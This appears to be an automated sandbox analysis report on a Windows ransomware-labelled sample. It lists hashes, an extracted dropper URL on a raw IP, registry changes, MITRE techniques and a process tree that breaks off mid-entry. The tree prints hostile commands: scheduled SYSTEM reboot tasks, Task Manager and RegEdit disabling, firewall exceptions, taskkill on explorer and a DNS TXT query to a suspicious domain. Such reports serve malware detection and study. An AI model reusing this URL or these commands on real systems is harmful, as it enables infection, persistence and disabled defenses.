a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6

Analysis

max time kernel
24s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
29/09/2022, 12:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe
Size

148KB
MD5

d197fad90535fb974db139537a091a5b
SHA1

5529175952d3fa0697124260e46ec1dbd0c63ae7
SHA256

a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6
SHA512

1d43209ee1d950a433b08a05a23c69f88b376db3f52f29c84301d5235febda52a37c690abec96c2dfd63d4917b731b5544a548ce1490d9cf36aba9a031bac35d
SSDEEP

3072:Gs6dE9I6+dZXlX1sZhuJHxleadYgJcuFsdazXflJv:GYpC16C6adXcFcz

Score

10^/10

bootkit discovery evasion persistence themida upx

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=XZIOFAVD&2=i-s&3=61&4=9200&5=6&6=2&7=919041&8=1033

Signatures

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	[email protected]

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Executes dropped EXE 23 IoCs

pid	Process
4068	[email protected]
3580	[email protected]
4248	[email protected]
1464	[email protected]
1820	[email protected]
3576	[email protected]
3536	[email protected]
3528	[email protected]
3720	[email protected]
3696	[email protected]
4240	[email protected]
4480	[email protected]
3208	[email protected]
4656	[email protected]
4664	[email protected]
3636	[email protected]
2124	[email protected]
5064	[email protected]
1808	[email protected]
2160	[email protected]
2860	[email protected]
3808	[email protected]
3068	xyYowMgI.exe

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Modify Existing Service

T1031

pid	Process
5960	netsh.exe
3516	netsh.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 18 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000022f6d-146.dat	upx
behavioral2/memory/3576-149-0x0000000000400000-0x0000000000438000-memory.dmp	upx
behavioral2/memory/3576-233-0x0000000000400000-0x0000000000438000-memory.dmp	upx
behavioral2/memory/3576-210-0x0000000000400000-0x0000000000438000-memory.dmp	upx
behavioral2/memory/2124-245-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/2124-234-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4568-277-0x0000000000400000-0x0000000000A35000-memory.dmp	upx
behavioral2/memory/4568-305-0x0000000000400000-0x0000000000A35000-memory.dmp	upx
behavioral2/memory/5580-325-0x0000000000400000-0x000000000044F000-memory.dmp	upx
behavioral2/memory/2372-323-0x0000000000400000-0x0000000000423000-memory.dmp	upx
behavioral2/memory/2372-285-0x0000000000400000-0x0000000000423000-memory.dmp	upx
behavioral2/memory/4568-335-0x0000000000400000-0x0000000000A35000-memory.dmp	upx
behavioral2/memory/6124-348-0x0000000000400000-0x0000000000A35000-memory.dmp	upx
behavioral2/memory/3576-355-0x0000000000400000-0x0000000000438000-memory.dmp	upx
behavioral2/memory/4568-279-0x0000000000400000-0x0000000000A35000-memory.dmp	upx
behavioral2/files/0x0006000000022f90-274.dat	upx
behavioral2/files/0x0006000000022f90-273.dat	upx
behavioral2/memory/4568-270-0x0000000000400000-0x0000000000A35000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe

Loads dropped DLL 1 IoCs

pid	Process
4184	rundll32.exe

Modifies file permissions 1 TTPs 3 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
7152	icacls.exe
6480	icacls.exe
5680	icacls.exe

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/3808-275-0x0000000000400000-0x0000000000CFB000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xyYowMgI.exe = "C:\\Users\\Admin\\uyAkIkYM\\xyYowMgI.exe"	[email protected]

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "DANGER"	[email protected]
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Äëÿ òîãî ÷òîáû âîññòàíîâèòü íîðìàëüíóþ ðàáîòó ñâîåãî êîìïüþòåðà íå ïîòåðÿâ ÂÑÞ èíôîðìàöèþ! È ñ ýêîíîìèâ äåíüãè, ïðèøëè ìíå íà e-mail [email protected] êîä ïîïîëíåíèÿ ñ÷åòà êèåâñòàð íà 25 ãðèâåíü. Â îòâåò â òå÷åíèå äâåíàäöàòè ÷àñîâ íà ñâîé e-mail òû ïîëó÷èøü ôàèë äëÿ óäàëåíèÿ ýòîé ïðîãðàììû."	[email protected]

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	[email protected]

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\infpub.dat	[email protected]

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6252	sc.exe
5340	sc.exe
1372	sc.exe
5636	sc.exe
5340	sc.exe
5592	sc.exe
5380	sc.exe
6440	sc.exe
5084	sc.exe
5472	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 13 IoCs

pid	pid_target	Process	procid_target
2388	4664	WerFault.exe	101
4200	4080	WerFault.exe	133
5312	6124	WerFault.exe	153
3340	5712	WerFault.exe	165
3772	5580	WerFault.exe	168
5164	3060	WerFault.exe	256
4688	1808	WerFault.exe	106
6628	6156	WerFault.exe	276
6580	6720	WerFault.exe	302
3492	4008	WerFault.exe	266
1780	6108	WerFault.exe	374
1012	3148	WerFault.exe	388
760	4424	WerFault.exe	406

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral2/files/0x0006000000022f80-153.dat	nsis_installer_1
behavioral2/files/0x0006000000022f80-153.dat	nsis_installer_2
behavioral2/files/0x0006000000022f80-172.dat	nsis_installer_1
behavioral2/files/0x0006000000022f80-172.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
6140	schtasks.exe

Kills process with taskkill 7 IoCs

evasion

pid	Process
4536	taskkill.exe
4612	taskkill.exe
7028	taskkill.exe
7020	taskkill.exe
5924	taskkill.exe
4552	taskkill.exe
4164	taskkill.exe

Modifies Control Panel 6 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\Desktop	[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\Desktop\WallpaperOriginX = "210"	[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\Desktop\WallpaperOriginY = "187"	[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\Desktop\MenuShowDelay = "9999"	[email protected]
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International	[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\sTimeFormat = "ÕÓÉ"	[email protected]

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	[email protected]
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::"	[email protected]

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/"	[email protected]

Modifies registry key 1 TTPs 24 IoCs

Modify Registry

T1112

pid	Process
6604	reg.exe
6816	reg.exe
4696	reg.exe
1952	reg.exe
4832	reg.exe
4984	reg.exe
6204	reg.exe
3920	reg.exe
6212	reg.exe
6640	reg.exe
3756	reg.exe
5920	reg.exe
6668	reg.exe
2352	reg.exe
3360	reg.exe
424	reg.exe
4392	reg.exe
2268	reg.exe
3240	reg.exe
6100	reg.exe
7080	reg.exe
5492	reg.exe
6196	reg.exe
932	reg.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	50	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	52	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2160	[email protected]
2160	[email protected]
2160	[email protected]
2160	[email protected]
4480	[email protected]
4480	[email protected]

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe
Token: SeSystemtimePrivilege	3208	[email protected]

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4068	[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1264 wrote to memory of 4068	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	87
PID 1264 wrote to memory of 4068	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	87
PID 1264 wrote to memory of 4068	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	87
PID 1264 wrote to memory of 3580	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	88
PID 1264 wrote to memory of 3580	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	88
PID 1264 wrote to memory of 3580	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	88
PID 1264 wrote to memory of 4248	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	89
PID 1264 wrote to memory of 4248	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	89
PID 1264 wrote to memory of 4248	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	89
PID 1264 wrote to memory of 1464	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	90
PID 1264 wrote to memory of 1464	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	90
PID 1264 wrote to memory of 1464	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	90
PID 1264 wrote to memory of 1820	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	91
PID 1264 wrote to memory of 1820	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	91
PID 1264 wrote to memory of 1820	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	91
PID 1264 wrote to memory of 3576	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	92
PID 1264 wrote to memory of 3576	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	92
PID 1264 wrote to memory of 3576	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	92
PID 1264 wrote to memory of 3536	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	93
PID 1264 wrote to memory of 3536	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	93
PID 1264 wrote to memory of 3536	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	93
PID 1264 wrote to memory of 3528	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	94
PID 1264 wrote to memory of 3528	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	94
PID 1264 wrote to memory of 3528	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	94
PID 1264 wrote to memory of 3720	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	95
PID 1264 wrote to memory of 3720	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	95
PID 1264 wrote to memory of 3720	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	95
PID 1264 wrote to memory of 3696	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	96
PID 1264 wrote to memory of 3696	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	96
PID 1264 wrote to memory of 3696	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	96
PID 1264 wrote to memory of 4240	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	97
PID 1264 wrote to memory of 4240	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	97
PID 1264 wrote to memory of 4240	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	97
PID 1264 wrote to memory of 4480	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	98
PID 1264 wrote to memory of 4480	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	98
PID 1264 wrote to memory of 4480	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	98
PID 1264 wrote to memory of 3208	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	99
PID 1264 wrote to memory of 3208	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	99
PID 1264 wrote to memory of 3208	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	99
PID 1264 wrote to memory of 4656	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	100
PID 1264 wrote to memory of 4656	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	100
PID 1264 wrote to memory of 4656	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	100
PID 1264 wrote to memory of 4664	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	101
PID 1264 wrote to memory of 4664	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	101
PID 1264 wrote to memory of 4664	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	101
PID 1264 wrote to memory of 3636	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	103
PID 1264 wrote to memory of 3636	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	103
PID 1264 wrote to memory of 3636	1264	UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe	103
PID 1264 wrote to memory of 2124	1264	Process not Found	104
PID 1264 wrote to memory of 2124	1264	Process not Found	104
PID 1264 wrote to memory of 2124	1264	Process not Found	104
PID 1264 wrote to memory of 5064	1264	Process not Found	105
PID 1264 wrote to memory of 5064	1264	Process not Found	105
PID 1264 wrote to memory of 5064	1264	Process not Found	105
PID 1264 wrote to memory of 1808	1264	Process not Found	106
PID 1264 wrote to memory of 1808	1264	Process not Found	106
PID 1264 wrote to memory of 1808	1264	Process not Found	106
PID 1264 wrote to memory of 2160	1264	Process not Found	107
PID 1264 wrote to memory of 2160	1264	Process not Found	107
PID 1264 wrote to memory of 2160	1264	Process not Found	107
PID 1264 wrote to memory of 2860	1264	Process not Found	108
PID 1264 wrote to memory of 2860	1264	Process not Found	108
PID 1264 wrote to memory of 2860	1264	Process not Found	108
PID 1820 wrote to memory of 4184	1820	[email protected]	109

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	[email protected]
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	[email protected]
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	[email protected]

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3232	attrib.exe
5496	attrib.exe
7104	attrib.exe

C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe
"C:\Users\Admin\AppData\Local\Temp\UDS-Virus.Win32.PolyRansom.a-a245bb21af350757ae0eebbd3e8a13332f48a02393cf508e2668835cc98e6dc6.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1264
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4068
- - C:\Windows\SysWOW64\net.exe
    net start wscsvc
    3⤵
    PID:3424
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start wscsvc
      4⤵
      PID:5780
- - C:\Windows\SysWOW64\Wbem\mofcomp.exe
    mofcomp C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof
    3⤵
    PID:4904
- - C:\Windows\SysWOW64\net.exe
    net start winmgmt
    3⤵
    PID:4784
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start winmgmt
      4⤵
      PID:5772
- - C:\Windows\SysWOW64\net.exe
    net stop winmgmt /y
    3⤵
    PID:5636
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop winmgmt /y
      4⤵
      PID:5708
- - C:\Windows\SysWOW64\net.exe
    net stop wscsvc
    3⤵
    PID:5344
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wscsvc
      4⤵
      PID:760
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:3580
- - C:\WINDOWS\302746537.exe
    "C:\WINDOWS\302746537.exe"
    3⤵
    PID:4808
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EB89.tmp\302746537.bat" "
      4⤵
      PID:6552
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:4248
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:1464
- - C:\Program Files (x86)\antiviruspc2009\avpc2009.exe
    "C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
    3⤵
    PID:2716
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:1820
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    PID:4184
  - - C:\Windows\SysWOW64\cmd.exe
      /c schtasks /Delete /F /TN rhaegal
      4⤵
      PID:1060
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /F /TN rhaegal
        5⤵
        
        PID:4172
  - - C:\Windows\SysWOW64\cmd.exe
      /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:58:00
      4⤵
      PID:6000
  - - C:\Windows\6E2B.tmp
      "C:\Windows\6E2B.tmp" \\.\pipe\{ADB2B812-0A6B-43DC-A115-6CADF766C8CE}
      4⤵
      PID:4404
  - - C:\Windows\SysWOW64\cmd.exe
      /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 118394473 && exit"
      4⤵
      PID:1412
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:3576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM explorer.exe
    3⤵
    - Kills process with taskkill
    PID:4536
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:3536
- - C:\Windows\SysWOW64\netsh.exe
    C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    PID:5960
- - C:\Windows\SysWOW64\netsh.exe
    C:\Windows\system32\netsh.exe advfirewall reset
    3⤵
    - Modifies Windows Firewall
    PID:3516
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:3528
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:3720
- - C:\Users\Admin\AppData\Local\6AdwCleaner.exe
    "C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
    3⤵
    PID:2928
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:3696
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:4240
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - Suspicious behavior: EnumeratesProcesses
  PID:4480
- - C:\Windows\SysWOW64\netsh.exe
    netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\[email protected]" "Internet Security Guard" ENABLE
    3⤵
    PID:4228
- - C:\Windows\SysWOW64\Wbem\mofcomp.exe
    mofcomp "C:\Users\Admin\AppData\Local\Temp\583.mof"
    3⤵
    PID:6160
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -q=txt howbemmov1309zhl.com 8.8.8.8
    3⤵
    PID:1180
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Disables RegEdit via registry modification
  - Executes dropped EXE
  - Modifies WinLogon
  - Modifies Control Panel
  - Modifies Internet Explorer settings
  - Modifies Internet Explorer start page
  - Suspicious use of AdjustPrivilegeToken
  - System policy modification
  PID:3208
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:4656
- - C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe
    "C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"
    3⤵
    PID:5928
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:4664
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 584
    3⤵
    - Program crash
    PID:2388
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:3636
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:2124
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:5064
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  PID:1808
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 444
    3⤵
    - Program crash
    PID:4688
- C:\Users\Admin\AppData\Local\Temp\[email protected]
  "C:\Users\Admin\AppData\Local\Temp\[email protected]"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  PID:2160
- - C:\ProgramData\OmsIsssM\hSwAwgQU.exe
    "C:\ProgramData\OmsIsssM\hSwAwgQU.exe"
    3⤵
    PID:4196
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /FI "USERNAME eq Admin" /F /IM xyYowMgI.exe
      4⤵
      Kills process with taskkill
      PID:7028
  - - C:\Users\Admin\uyAkIkYM\xyYowMgI.exe
      "C:\Users\Admin\uyAkIkYM\xyYowMgI.exe"
      4⤵
      PID:3224
    - - C:\Windows\SysWOW64\taskkill.exe
        
